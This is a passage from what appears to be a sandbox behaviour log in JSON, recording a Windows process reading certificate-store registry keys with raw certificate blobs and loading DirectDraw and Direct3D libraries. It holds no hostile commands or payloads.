\\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r280801235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 336, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 337, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ \\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 340, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 341, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 342, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 343, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 344, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 345, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 346, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 347, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 348, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 349, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress", + "content": "0" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 350, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 351, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 352, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress", + "content": "0" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 353, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 354, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x83\\xb6S\\x18fNo\\xa2E\\xe0\\xd7`\\x9f\\xb9X \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x10\\x9f\\x1c\\xae\\xd6E\\xbbx\\xb3\\xea+\\x94\\xc0i|t\\x073\\x03\\x1c\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00&]\\x05\\x07\\xd8/\\xa2`\\x84\\xbd\\x83}\\xf5!\\x80\\xa7\\x05oZ\\x85 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x13\\x04\\x00\\x000\\x82\\x04\\x0f0\\x82\\x02\\xf7\\xa0\\x03\\x02\\x01\\x02\\x02\n\\x19\\x8b\\x11\\xd1?\\x9a\\x8f\\xfei\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r971001070000Z\\x17\r021231070000Z0\\x81\\xc31+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1A0?\\x06\\x03U\\x04\\x0b\\x138Microsoft Windows Hardware Compatibility Intermediate CA1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation110/\\x06\\x03U\\x04\\x03\\x13(Microsoft Windows Hardware Compatibility0\\x81\\x9f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 355, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 356, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob", + "content": "\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xac\\xd8\\x0e\\xa2{\\xb7,\\xe7\\x00\\xdc\"rJ_\\x1e\\x92\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Is\\xe0\\x92\\xcf\\x8a\\x9e,\\xa5\\xf9\\x88I:[\\xac\\xfe8\\x95\\x94.\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\n\\xcf\\xebK\\x07\\xe7\\x03\\xa0\\x1fL\\xef(\\xeerV\\xf7Qu\\x91U\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xd6\\xed}\\xf5/\\xc1\\x9b\\xdc\\x9e_\\xe9\\xe2\\xbe!\\xfb\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xd5Y\\xa5\\x86f\\x9b\\x08\\xf4j0\\xa13\\xf8\\xa9\\xed=\\x03\\x8e.\\xa8 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x87\\x03\\x00\\x000\\x82\\x03\\x830\\x82\\x02\\xec\\xa0\\x03\\x02\\x01\\x02\\x02\\x10F\\xfc\\xeb\\xba\\xb4\\xd0/\\x0f\\x92`\\x98#?\\x93\\x07\\x8f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r970417000000Z\\x17\r161024235959Z0\\x81\\xba1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign International Server CA - Class 31I0G\\x06\\x03U\\x04\\x0b\\x13@www.verisign.com/CPS" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 357, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 358, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xed\\xbc\\xcd\\xd5\\x10j\\x07\\x1c]\\x8bF\\x90\\x91\\x8eH\\xaa\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xfe\\xe4I\\xee\\x0e9e\\xa5$o\\x00\\x0e\\x87\\xfd\\xe2\\xa0e\\xfd\\x89\\xd4\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x9a\\xa6X\\x7f\\x94\\xdd\\x91\\xd9\\x1ec\\xdf\\xd3\\xf0\\xce_\\xae\\x18\\x93\\xaa\\xb7 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xce\\x01\\x00\\x000\\x82\\x01\\xca0\\x82\\x01t\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0\\x1e\\x17\r960528220259Z\\x17\r391231235959Z0\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0[0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03J\\x000G\\x02@\\x81U\"\\xb9\\x8a\\xa4o\\xed\\xd6\\xe7\\xd9f\\x0fU\\xbc\\xd7\\xcd\\xd5\\xbcN@\\x02!\\xa2\\xb1\\xf7\\x870\\x85^\\xd2\\xf2D\\xb9\\xdc\\x9bu\\xb6\\xfbF_B\\xb6\\x9d#6\\x0b\\xdeT\\x0f\\xcd\\xbd\\x1f\\x99*\\x10X\\x11\\xcb@\\xcb\\xb5\\xa7A\\x02\\x03\\x01\\x00\\x01\\xa3\\x81\\x9e0\\x81\\x9b0P\\x06\\x03U\\x04\\x03\\x04I\\x13GFor Testing Purposes Only Sample Software Publishing Credentials Agency0G\\x06\\x03U\\x1d\\x01\\x04@0>\\x80\\x10\\x12\\xe4\t-\\x06\\x1d\\x1dO\\x00\\x8da!\\xdc\\x16dc\\xa1\\x180\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency\\x82\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x00\\x03A\\x00-.>{\\x89B\\x89?\\xa8!" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 359, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 360, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob", + "content": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xa3w\\xd1\\xb1\\xc0S\\x883\\x03R\\x11\\xf4\\x08=\\x00\\xfe\\xccAM\\xab!\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb5\\x01\\x00\\x000\\x82\\x01\\xb10\\x82\\x01\\x1a\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000a1\\x110\\x0f\\x06\\x03U\\x04\\x07\\x13\\x08Internet1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign Commercial Software Publishers CA\\x17\r010324000000Z\\x17\r040107235959Z0i0!\\x02\\x10\\x1bQ\\x90\\xf77$9\\x9c\\x92T\\xcdBF7\\x99j\\x17\r010130000124Z0!\\x02\\x10u\\x0e@\\xff\\x97\\xf0G\\xed\\xf5V\\xc7\\x08N\\xb1\\xab\\xfd\\x17\r010131000049Z0!\\x02\\x10w\\xe6ZCY\\x93]_zu\\x80\\x1a\\xcd\\xad\\xc2\"\\x17\r000831000056Z\\xa0\\x1a0\\x180\t\\x06\\x03U\\x1d\\x13\\x04\\x020\\x000\\x0b\\x06\\x03U\\x1d\\x0f\\x04\\x04\\x03\\x02\\x05\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x00\\x03\\x81\\x81\\x00\\x18,\\xe8\\xfc\\x16m\\x91J=\\x88TH]\\xb8\\x11\\xbfd\\xbb\\xf9\\xdaY\\x19\\xdd\\x0ee\\xab\\xc0\\x0c\\xfag~!\\x1e\\x83\\x0e\\xcf\\x9b\\x89\\x8a\\xcf\\x0cK\\xc19\\x9d\\xe7j\\xacFtj\\x91b\"\r\\xc4\\x08\\xbd\\xf5\n\\x90\\x7f\\x06!=~\\xa7\\xaa^\\xcd\"\\x15\\xe6\\x0cu\\x8en\\xad\\xf1\\x84\\xe4\"\\xb40o\\xfbd\\x8f\\xd7\\x80C\\xf5\\x19\\x18f\\x1dr\\xa3\\xe3\\x94\\x82(R\\xa0\\x06N\\xb1\\xc8\\x92\\x0c\\x97\\xbe\\x15\\x07\\xabz\\xc9\\xea\\x08gCMQc;\\x9c\\x9c\\xcd" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 361, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 362, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob", + "content": 